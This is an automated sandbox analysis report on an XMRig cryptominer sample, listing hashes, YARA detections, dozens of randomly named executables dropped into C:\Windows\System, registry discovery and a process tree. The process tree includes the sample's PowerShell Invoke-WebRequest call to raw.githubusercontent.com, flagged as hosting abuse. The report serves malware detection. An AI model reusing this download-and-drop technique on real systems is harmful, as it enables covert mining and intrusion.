xmrig | e6da96e97dd8087497c18bb8a6415963d70bcdefe27a00cbb5fe6ae9f15cd6af

Analysis

max time kernel
95s
max time network
99s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
23/07/2024, 21:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

101b4f0f83dca8f89275d571d87e0e80N.exe
Size

1.6MB
MD5

101b4f0f83dca8f89275d571d87e0e80
SHA1

732b31ab4a20b8b5152398ec49503406f7b55f6d
SHA256

e6da96e97dd8087497c18bb8a6415963d70bcdefe27a00cbb5fe6ae9f15cd6af
SHA512

e86565d91fb00c5144590cdd879df0faed3f9d46bc68443bf944a747114fbbbb9c07de5729056b99d70cd2caecdbe9e2acb543b1a3b7289a49c2b4b1a6032809
SSDEEP

49152:Lz071uv4BPMkibTIA5EAR24Gm/rfjc40ci:NAB/

Score

10^/10

xmrig execution miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 48 IoCs

miner

resource	yara_rule
behavioral2/memory/3680-91-0x00007FF700590000-0x00007FF700982000-memory.dmp	xmrig
behavioral2/memory/3584-93-0x00007FF750F20000-0x00007FF751312000-memory.dmp	xmrig
behavioral2/memory/460-95-0x00007FF617670000-0x00007FF617A62000-memory.dmp	xmrig
behavioral2/memory/2936-97-0x00007FF61A5B0000-0x00007FF61A9A2000-memory.dmp	xmrig
behavioral2/memory/2116-98-0x00007FF78F7B0000-0x00007FF78FBA2000-memory.dmp	xmrig
behavioral2/memory/3580-96-0x00007FF600F20000-0x00007FF601312000-memory.dmp	xmrig
behavioral2/memory/3192-94-0x00007FF7F3090000-0x00007FF7F3482000-memory.dmp	xmrig
behavioral2/memory/4040-92-0x00007FF7A4D70000-0x00007FF7A5162000-memory.dmp	xmrig
behavioral2/memory/2184-90-0x00007FF6694B0000-0x00007FF6698A2000-memory.dmp	xmrig
behavioral2/memory/872-78-0x00007FF704EA0000-0x00007FF705292000-memory.dmp	xmrig
behavioral2/memory/4840-77-0x00007FF65BD80000-0x00007FF65C172000-memory.dmp	xmrig
behavioral2/memory/3592-74-0x00007FF6F1860000-0x00007FF6F1C52000-memory.dmp	xmrig
behavioral2/memory/4748-122-0x00007FF72B860000-0x00007FF72BC52000-memory.dmp	xmrig
behavioral2/memory/2728-380-0x00007FF7B38B0000-0x00007FF7B3CA2000-memory.dmp	xmrig
behavioral2/memory/4500-382-0x00007FF79E220000-0x00007FF79E612000-memory.dmp	xmrig
behavioral2/memory/2092-381-0x00007FF74A5B0000-0x00007FF74A9A2000-memory.dmp	xmrig
behavioral2/memory/3480-156-0x00007FF675FC0000-0x00007FF6763B2000-memory.dmp	xmrig
behavioral2/memory/4244-148-0x00007FF78CA90000-0x00007FF78CE82000-memory.dmp	xmrig
behavioral2/memory/4624-143-0x00007FF67CC70000-0x00007FF67D062000-memory.dmp	xmrig
behavioral2/memory/820-1985-0x00007FF7FEA00000-0x00007FF7FEDF2000-memory.dmp	xmrig
behavioral2/memory/1340-1991-0x00007FF63A890000-0x00007FF63AC82000-memory.dmp	xmrig
behavioral2/memory/364-2010-0x00007FF64AE00000-0x00007FF64B1F2000-memory.dmp	xmrig
behavioral2/memory/2552-2011-0x00007FF748DB0000-0x00007FF7491A2000-memory.dmp	xmrig
behavioral2/memory/2172-2017-0x00007FF71A990000-0x00007FF71AD82000-memory.dmp	xmrig
behavioral2/memory/1340-2020-0x00007FF63A890000-0x00007FF63AC82000-memory.dmp	xmrig
behavioral2/memory/820-2022-0x00007FF7FEA00000-0x00007FF7FEDF2000-memory.dmp	xmrig
behavioral2/memory/4840-2024-0x00007FF65BD80000-0x00007FF65C172000-memory.dmp	xmrig
behavioral2/memory/460-2026-0x00007FF617670000-0x00007FF617A62000-memory.dmp	xmrig
behavioral2/memory/3580-2028-0x00007FF600F20000-0x00007FF601312000-memory.dmp	xmrig
behavioral2/memory/2184-2031-0x00007FF6694B0000-0x00007FF6698A2000-memory.dmp	xmrig
behavioral2/memory/872-2038-0x00007FF704EA0000-0x00007FF705292000-memory.dmp	xmrig
behavioral2/memory/3680-2036-0x00007FF700590000-0x00007FF700982000-memory.dmp	xmrig
behavioral2/memory/2936-2040-0x00007FF61A5B0000-0x00007FF61A9A2000-memory.dmp	xmrig
behavioral2/memory/4040-2033-0x00007FF7A4D70000-0x00007FF7A5162000-memory.dmp	xmrig
behavioral2/memory/3592-2035-0x00007FF6F1860000-0x00007FF6F1C52000-memory.dmp	xmrig
behavioral2/memory/3192-2043-0x00007FF7F3090000-0x00007FF7F3482000-memory.dmp	xmrig
behavioral2/memory/3584-2044-0x00007FF750F20000-0x00007FF751312000-memory.dmp	xmrig
behavioral2/memory/2116-2046-0x00007FF78F7B0000-0x00007FF78FBA2000-memory.dmp	xmrig
behavioral2/memory/364-2105-0x00007FF64AE00000-0x00007FF64B1F2000-memory.dmp	xmrig
behavioral2/memory/4748-2107-0x00007FF72B860000-0x00007FF72BC52000-memory.dmp	xmrig
behavioral2/memory/4624-2110-0x00007FF67CC70000-0x00007FF67D062000-memory.dmp	xmrig
behavioral2/memory/4244-2115-0x00007FF78CA90000-0x00007FF78CE82000-memory.dmp	xmrig
behavioral2/memory/3480-2113-0x00007FF675FC0000-0x00007FF6763B2000-memory.dmp	xmrig
behavioral2/memory/2552-2112-0x00007FF748DB0000-0x00007FF7491A2000-memory.dmp	xmrig
behavioral2/memory/2728-2120-0x00007FF7B38B0000-0x00007FF7B3CA2000-memory.dmp	xmrig
behavioral2/memory/4500-2124-0x00007FF79E220000-0x00007FF79E612000-memory.dmp	xmrig
behavioral2/memory/2172-2123-0x00007FF71A990000-0x00007FF71AD82000-memory.dmp	xmrig
behavioral2/memory/2092-2118-0x00007FF74A5B0000-0x00007FF74A9A2000-memory.dmp	xmrig

Blocklisted process makes network request 2 IoCs

flow	pid	Process
9	2148	powershell.exe
12	2148	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
2148	powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
1340	CwckSrX.exe
820	KEiNoxt.exe
460	uvMLbOH.exe
3592	tKLBYpY.exe
4840	RcmjVXg.exe
3580	nSJkQDi.exe
872	eAFjPXn.exe
2184	CPbpzKp.exe
3680	dvXXrSq.exe
4040	XxiDJEK.exe
2936	qdNykuC.exe
3584	AmwosOR.exe
3192	TXYzOTE.exe
2116	zjAVFBq.exe
364	Khgyecg.exe
4748	lbuALOf.exe
3480	pNhBBWR.exe
2552	inTowNt.exe
4624	aBjCDxO.exe
4244	cBmFOkG.exe
2728	nsjDamA.exe
2092	yIrymal.exe
2172	RDNvTBT.exe
4500	zklISHA.exe
896	vSvHiJM.exe
1180	FMHoKwB.exe
4860	glXASqc.exe
1860	BAzZPMY.exe
4028	cRsmVkn.exe
3576	QEMatyk.exe
2740	kDSsRco.exe
3688	fymZKJy.exe
4524	SPEimhJ.exe
4188	cRSMKSh.exe
4332	xVDSOiP.exe
3728	kLHVxWp.exe
524	UHioooD.exe
8	KKVUrGS.exe
2128	lTxtKyj.exe
3960	kBjXgVi.exe
4888	IKNgFjX.exe
3408	YdpVHSM.exe
2864	xgMdxoB.exe
540	EybwgPo.exe
1720	OnJJNNn.exe
768	rxjYlFD.exe
4640	GmKOnQZ.exe
4932	DJMNDPJ.exe
224	cMsPswK.exe
2252	yQuVWoE.exe
632	BNIJsgd.exe
3324	OtWnIRc.exe
1472	TkWNKwI.exe
2892	cqCvVOW.exe
5064	KiVCRfD.exe
3288	osKDbcQ.exe
436	FbrTUfe.exe
3204	upDyQWr.exe
1436	BEkRCYX.exe
1096	vLQWjmr.exe
2244	qIvZkTZ.exe
4960	ROAGrpA.exe
4392	wXUUxTS.exe
2452	xGJnefw.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/452-0-0x00007FF6D7BF0000-0x00007FF6D7FE2000-memory.dmp	upx
behavioral2/files/0x000700000002343f-7.dat	upx
behavioral2/files/0x000700000002343e-10.dat	upx
behavioral2/files/0x000800000002343a-12.dat	upx
behavioral2/files/0x0007000000023442-28.dat	upx
behavioral2/files/0x0007000000023443-42.dat	upx
behavioral2/files/0x0007000000023448-62.dat	upx
behavioral2/files/0x0007000000023447-68.dat	upx
behavioral2/files/0x0007000000023449-71.dat	upx
behavioral2/files/0x000700000002344a-76.dat	upx
behavioral2/memory/3680-91-0x00007FF700590000-0x00007FF700982000-memory.dmp	upx
behavioral2/memory/3584-93-0x00007FF750F20000-0x00007FF751312000-memory.dmp	upx
behavioral2/memory/460-95-0x00007FF617670000-0x00007FF617A62000-memory.dmp	upx
behavioral2/memory/2936-97-0x00007FF61A5B0000-0x00007FF61A9A2000-memory.dmp	upx
behavioral2/memory/2116-98-0x00007FF78F7B0000-0x00007FF78FBA2000-memory.dmp	upx
behavioral2/memory/3580-96-0x00007FF600F20000-0x00007FF601312000-memory.dmp	upx
behavioral2/memory/3192-94-0x00007FF7F3090000-0x00007FF7F3482000-memory.dmp	upx
behavioral2/memory/4040-92-0x00007FF7A4D70000-0x00007FF7A5162000-memory.dmp	upx
behavioral2/memory/2184-90-0x00007FF6694B0000-0x00007FF6698A2000-memory.dmp	upx
behavioral2/memory/872-78-0x00007FF704EA0000-0x00007FF705292000-memory.dmp	upx
behavioral2/memory/4840-77-0x00007FF65BD80000-0x00007FF65C172000-memory.dmp	upx
behavioral2/memory/3592-74-0x00007FF6F1860000-0x00007FF6F1C52000-memory.dmp	upx
behavioral2/files/0x0007000000023445-55.dat	upx
behavioral2/files/0x0007000000023446-52.dat	upx
behavioral2/files/0x0007000000023444-46.dat	upx
behavioral2/files/0x0007000000023440-35.dat	upx
behavioral2/memory/820-25-0x00007FF7FEA00000-0x00007FF7FEDF2000-memory.dmp	upx
behavioral2/files/0x0007000000023441-24.dat	upx
behavioral2/files/0x000800000002343b-102.dat	upx
behavioral2/memory/4748-122-0x00007FF72B860000-0x00007FF72BC52000-memory.dmp	upx
behavioral2/files/0x000700000002344f-121.dat	upx
behavioral2/files/0x000800000002344c-124.dat	upx
behavioral2/files/0x0007000000023450-133.dat	upx
behavioral2/files/0x0007000000023452-142.dat	upx
behavioral2/files/0x0007000000023451-152.dat	upx
behavioral2/files/0x0007000000023455-164.dat	upx
behavioral2/files/0x0007000000023457-174.dat	upx
behavioral2/files/0x000700000002345b-192.dat	upx
behavioral2/memory/2728-380-0x00007FF7B38B0000-0x00007FF7B3CA2000-memory.dmp	upx
behavioral2/memory/4500-382-0x00007FF79E220000-0x00007FF79E612000-memory.dmp	upx
behavioral2/memory/2092-381-0x00007FF74A5B0000-0x00007FF74A9A2000-memory.dmp	upx
behavioral2/files/0x000700000002345c-197.dat	upx
behavioral2/files/0x000700000002345a-195.dat	upx
behavioral2/files/0x0007000000023459-187.dat	upx
behavioral2/files/0x0007000000023458-183.dat	upx
behavioral2/files/0x0007000000023456-172.dat	upx
behavioral2/files/0x0007000000023454-161.dat	upx
behavioral2/memory/3480-156-0x00007FF675FC0000-0x00007FF6763B2000-memory.dmp	upx
behavioral2/memory/2172-150-0x00007FF71A990000-0x00007FF71AD82000-memory.dmp	upx
behavioral2/files/0x0007000000023453-149.dat	upx
behavioral2/memory/4244-148-0x00007FF78CA90000-0x00007FF78CE82000-memory.dmp	upx
behavioral2/memory/4624-143-0x00007FF67CC70000-0x00007FF67D062000-memory.dmp	upx
behavioral2/memory/2552-137-0x00007FF748DB0000-0x00007FF7491A2000-memory.dmp	upx
behavioral2/files/0x000700000002344e-129.dat	upx
behavioral2/files/0x000700000002344d-128.dat	upx
behavioral2/memory/364-114-0x00007FF64AE00000-0x00007FF64B1F2000-memory.dmp	upx
behavioral2/files/0x000800000002344b-107.dat	upx
behavioral2/memory/1340-11-0x00007FF63A890000-0x00007FF63AC82000-memory.dmp	upx
behavioral2/memory/820-1985-0x00007FF7FEA00000-0x00007FF7FEDF2000-memory.dmp	upx
behavioral2/memory/1340-1991-0x00007FF63A890000-0x00007FF63AC82000-memory.dmp	upx
behavioral2/memory/364-2010-0x00007FF64AE00000-0x00007FF64B1F2000-memory.dmp	upx
behavioral2/memory/2552-2011-0x00007FF748DB0000-0x00007FF7491A2000-memory.dmp	upx
behavioral2/memory/2172-2017-0x00007FF71A990000-0x00007FF71AD82000-memory.dmp	upx
behavioral2/memory/1340-2020-0x00007FF63A890000-0x00007FF63AC82000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
8	raw.githubusercontent.com
9	raw.githubusercontent.com

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\System\mhwzphY.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\SvxfgXV.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\WdAdKqE.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\WYSnraW.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\rAyeolv.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\AkQfeqb.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\TkWNKwI.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\CvCpvbz.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\lkUpRvs.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\dQDAuWi.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\QLpeepq.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\YQZChzE.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\sjZIatW.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\HeRXREd.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\cqWGDeu.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\IyFgFGB.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\yrsbXAm.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\bfVDUos.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\URJprDV.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\zhobztj.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\RhioTZF.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\GQdTpvo.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\TeSnmBx.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\HEXXvJl.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\jQaScll.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\yvoxtJj.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\CwckSrX.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\FKxfHOD.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\zZfOPxr.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\MfOkfoL.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\BLUGOfg.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\yNaBCCH.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\mrKyLaw.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\DZCXMiS.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\cPWlhvz.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\oPOnJVZ.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\qWDLrGY.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\UcEgJYO.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\IEzqLJx.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\nsjDamA.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\FfzYJYv.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\iUeteee.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\pQIwQXJ.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\QgZQXqL.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\ycTfETS.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\EybwgPo.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\ZKZLqdg.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\vrjFLKv.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\hmLIOUY.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\CMPoKaK.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\nEGwMZN.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\SnVUMwq.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\zklISHA.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\XZdbXIn.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\KktnKzA.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\CWbKunG.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\Wawejwf.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\pltALaT.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\KNjNYSV.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\mAfHaXK.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\xcVTqSS.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\JBmOamq.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\oANUJwY.exe	101b4f0f83dca8f89275d571d87e0e80N.exe
File created	C:\Windows\System\qVfTxiC.exe	101b4f0f83dca8f89275d571d87e0e80N.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2148	powershell.exe
2148	powershell.exe
2148	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	452	101b4f0f83dca8f89275d571d87e0e80N.exe
Token: SeDebugPrivilege	2148	powershell.exe
Token: SeLockMemoryPrivilege	452	101b4f0f83dca8f89275d571d87e0e80N.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 452 wrote to memory of 2148	452	101b4f0f83dca8f89275d571d87e0e80N.exe	85
PID 452 wrote to memory of 2148	452	101b4f0f83dca8f89275d571d87e0e80N.exe	85
PID 452 wrote to memory of 1340	452	101b4f0f83dca8f89275d571d87e0e80N.exe	86
PID 452 wrote to memory of 1340	452	101b4f0f83dca8f89275d571d87e0e80N.exe	86
PID 452 wrote to memory of 820	452	101b4f0f83dca8f89275d571d87e0e80N.exe	87
PID 452 wrote to memory of 820	452	101b4f0f83dca8f89275d571d87e0e80N.exe	87
PID 452 wrote to memory of 460	452	101b4f0f83dca8f89275d571d87e0e80N.exe	88
PID 452 wrote to memory of 460	452	101b4f0f83dca8f89275d571d87e0e80N.exe	88
PID 452 wrote to memory of 3592	452	101b4f0f83dca8f89275d571d87e0e80N.exe	89
PID 452 wrote to memory of 3592	452	101b4f0f83dca8f89275d571d87e0e80N.exe	89
PID 452 wrote to memory of 4840	452	101b4f0f83dca8f89275d571d87e0e80N.exe	90
PID 452 wrote to memory of 4840	452	101b4f0f83dca8f89275d571d87e0e80N.exe	90
PID 452 wrote to memory of 3580	452	101b4f0f83dca8f89275d571d87e0e80N.exe	91
PID 452 wrote to memory of 3580	452	101b4f0f83dca8f89275d571d87e0e80N.exe	91
PID 452 wrote to memory of 872	452	101b4f0f83dca8f89275d571d87e0e80N.exe	92
PID 452 wrote to memory of 872	452	101b4f0f83dca8f89275d571d87e0e80N.exe	92
PID 452 wrote to memory of 2184	452	101b4f0f83dca8f89275d571d87e0e80N.exe	93
PID 452 wrote to memory of 2184	452	101b4f0f83dca8f89275d571d87e0e80N.exe	93
PID 452 wrote to memory of 3680	452	101b4f0f83dca8f89275d571d87e0e80N.exe	94
PID 452 wrote to memory of 3680	452	101b4f0f83dca8f89275d571d87e0e80N.exe	94
PID 452 wrote to memory of 4040	452	101b4f0f83dca8f89275d571d87e0e80N.exe	95
PID 452 wrote to memory of 4040	452	101b4f0f83dca8f89275d571d87e0e80N.exe	95
PID 452 wrote to memory of 3584	452	101b4f0f83dca8f89275d571d87e0e80N.exe	96
PID 452 wrote to memory of 3584	452	101b4f0f83dca8f89275d571d87e0e80N.exe	96
PID 452 wrote to memory of 2936	452	101b4f0f83dca8f89275d571d87e0e80N.exe	97
PID 452 wrote to memory of 2936	452	101b4f0f83dca8f89275d571d87e0e80N.exe	97
PID 452 wrote to memory of 3192	452	101b4f0f83dca8f89275d571d87e0e80N.exe	98
PID 452 wrote to memory of 3192	452	101b4f0f83dca8f89275d571d87e0e80N.exe	98
PID 452 wrote to memory of 2116	452	101b4f0f83dca8f89275d571d87e0e80N.exe	99
PID 452 wrote to memory of 2116	452	101b4f0f83dca8f89275d571d87e0e80N.exe	99
PID 452 wrote to memory of 364	452	101b4f0f83dca8f89275d571d87e0e80N.exe	100
PID 452 wrote to memory of 364	452	101b4f0f83dca8f89275d571d87e0e80N.exe	100
PID 452 wrote to memory of 4748	452	101b4f0f83dca8f89275d571d87e0e80N.exe	101
PID 452 wrote to memory of 4748	452	101b4f0f83dca8f89275d571d87e0e80N.exe	101
PID 452 wrote to memory of 4244	452	101b4f0f83dca8f89275d571d87e0e80N.exe	102
PID 452 wrote to memory of 4244	452	101b4f0f83dca8f89275d571d87e0e80N.exe	102
PID 452 wrote to memory of 3480	452	101b4f0f83dca8f89275d571d87e0e80N.exe	103
PID 452 wrote to memory of 3480	452	101b4f0f83dca8f89275d571d87e0e80N.exe	103
PID 452 wrote to memory of 2552	452	101b4f0f83dca8f89275d571d87e0e80N.exe	104
PID 452 wrote to memory of 2552	452	101b4f0f83dca8f89275d571d87e0e80N.exe	104
PID 452 wrote to memory of 4624	452	101b4f0f83dca8f89275d571d87e0e80N.exe	105
PID 452 wrote to memory of 4624	452	101b4f0f83dca8f89275d571d87e0e80N.exe	105
PID 452 wrote to memory of 2728	452	101b4f0f83dca8f89275d571d87e0e80N.exe	106
PID 452 wrote to memory of 2728	452	101b4f0f83dca8f89275d571d87e0e80N.exe	106
PID 452 wrote to memory of 2092	452	101b4f0f83dca8f89275d571d87e0e80N.exe	107
PID 452 wrote to memory of 2092	452	101b4f0f83dca8f89275d571d87e0e80N.exe	107
PID 452 wrote to memory of 2172	452	101b4f0f83dca8f89275d571d87e0e80N.exe	108
PID 452 wrote to memory of 2172	452	101b4f0f83dca8f89275d571d87e0e80N.exe	108
PID 452 wrote to memory of 4500	452	101b4f0f83dca8f89275d571d87e0e80N.exe	109
PID 452 wrote to memory of 4500	452	101b4f0f83dca8f89275d571d87e0e80N.exe	109
PID 452 wrote to memory of 896	452	101b4f0f83dca8f89275d571d87e0e80N.exe	110
PID 452 wrote to memory of 896	452	101b4f0f83dca8f89275d571d87e0e80N.exe	110
PID 452 wrote to memory of 1180	452	101b4f0f83dca8f89275d571d87e0e80N.exe	111
PID 452 wrote to memory of 1180	452	101b4f0f83dca8f89275d571d87e0e80N.exe	111
PID 452 wrote to memory of 4860	452	101b4f0f83dca8f89275d571d87e0e80N.exe	112
PID 452 wrote to memory of 4860	452	101b4f0f83dca8f89275d571d87e0e80N.exe	112
PID 452 wrote to memory of 1860	452	101b4f0f83dca8f89275d571d87e0e80N.exe	113
PID 452 wrote to memory of 1860	452	101b4f0f83dca8f89275d571d87e0e80N.exe	113
PID 452 wrote to memory of 4028	452	101b4f0f83dca8f89275d571d87e0e80N.exe	114
PID 452 wrote to memory of 4028	452	101b4f0f83dca8f89275d571d87e0e80N.exe	114
PID 452 wrote to memory of 3576	452	101b4f0f83dca8f89275d571d87e0e80N.exe	115
PID 452 wrote to memory of 3576	452	101b4f0f83dca8f89275d571d87e0e80N.exe	115
PID 452 wrote to memory of 2740	452	101b4f0f83dca8f89275d571d87e0e80N.exe	116
PID 452 wrote to memory of 2740	452	101b4f0f83dca8f89275d571d87e0e80N.exe	116

C:\Users\Admin\AppData\Local\Temp\101b4f0f83dca8f89275d571d87e0e80N.exe
"C:\Users\Admin\AppData\Local\Temp\101b4f0f83dca8f89275d571d87e0e80N.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:452
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2148
- - C:\Windows\system32\wermgr.exe
    "C:\Windows\system32\wermgr.exe" "-outproc" "0" "2148" "2980" "2544" "2984" "0" "0" "2988" "0" "0" "0" "0" "0"
    3⤵
    - Checks processor information in registry
    - Enumerates system info in registry
    PID:12932
- C:\Windows\System\CwckSrX.exe
  C:\Windows\System\CwckSrX.exe
  2⤵
  - Executes dropped EXE
  PID:1340
- C:\Windows\System\KEiNoxt.exe
  C:\Windows\System\KEiNoxt.exe
  2⤵
  - Executes dropped EXE
  PID:820
- C:\Windows\System\uvMLbOH.exe
  C:\Windows\System\uvMLbOH.exe
  2⤵
  - Executes dropped EXE
  PID:460
- C:\Windows\System\tKLBYpY.exe
  C:\Windows\System\tKLBYpY.exe
  2⤵
  - Executes dropped EXE
  PID:3592
- C:\Windows\System\RcmjVXg.exe
  C:\Windows\System\RcmjVXg.exe
  2⤵
  - Executes dropped EXE
  PID:4840
- C:\Windows\System\nSJkQDi.exe
  C:\Windows\System\nSJkQDi.exe
  2⤵
  - Executes dropped EXE
  PID:3580
- C:\Windows\System\eAFjPXn.exe
  C:\Windows\System\eAFjPXn.exe
  2⤵
  - Executes dropped EXE
  PID:872
- C:\Windows\System\CPbpzKp.exe
  C:\Windows\System\CPbpzKp.exe
  2⤵
  - Executes dropped EXE
  PID:2184
- C:\Windows\System\dvXXrSq.exe
  C:\Windows\System\dvXXrSq.exe
  2⤵
  - Executes dropped EXE
  PID:3680
- C:\Windows\System\XxiDJEK.exe
  C:\Windows\System\XxiDJEK.exe
  2⤵
  - Executes dropped EXE
  PID:4040
- C:\Windows\System\AmwosOR.exe
  C:\Windows\System\AmwosOR.exe
  2⤵
  - Executes dropped EXE
  PID:3584
- C:\Windows\System\qdNykuC.exe
  C:\Windows\System\qdNykuC.exe
  2⤵
  - Executes dropped EXE
  PID:2936
- C:\Windows\System\TXYzOTE.exe
  C:\Windows\System\TXYzOTE.exe
  2⤵
  - Executes dropped EXE
  PID:3192
- C:\Windows\System\zjAVFBq.exe
  C:\Windows\System\zjAVFBq.exe
  2⤵
  - Executes dropped EXE
  PID:2116
- C:\Windows\System\Khgyecg.exe
  C:\Windows\System\Khgyecg.exe
  2⤵
  - Executes dropped EXE
  PID:364
- C:\Windows\System\lbuALOf.exe
  C:\Windows\System\lbuALOf.exe
  2⤵
  - Executes dropped EXE
  PID:4748
- C:\Windows\System\cBmFOkG.exe
  C:\Windows\System\cBmFOkG.exe
  2⤵
  - Executes dropped EXE
  PID:4244
- C:\Windows\System\pNhBBWR.exe
  C:\Windows\System\pNhBBWR.exe
  2⤵
  - Executes dropped EXE
  PID:3480
- C:\Windows\System\inTowNt.exe
  C:\Windows\System\inTowNt.exe
  2⤵
  - Executes dropped EXE
  PID:2552
- C:\Windows\System\aBjCDxO.exe
  C:\Windows\System\aBjCDxO.exe
  2⤵
  - Executes dropped EXE
  PID:4624
- C:\Windows\System\nsjDamA.exe
  C:\Windows\System\nsjDamA.exe
  2⤵
  - Executes dropped EXE
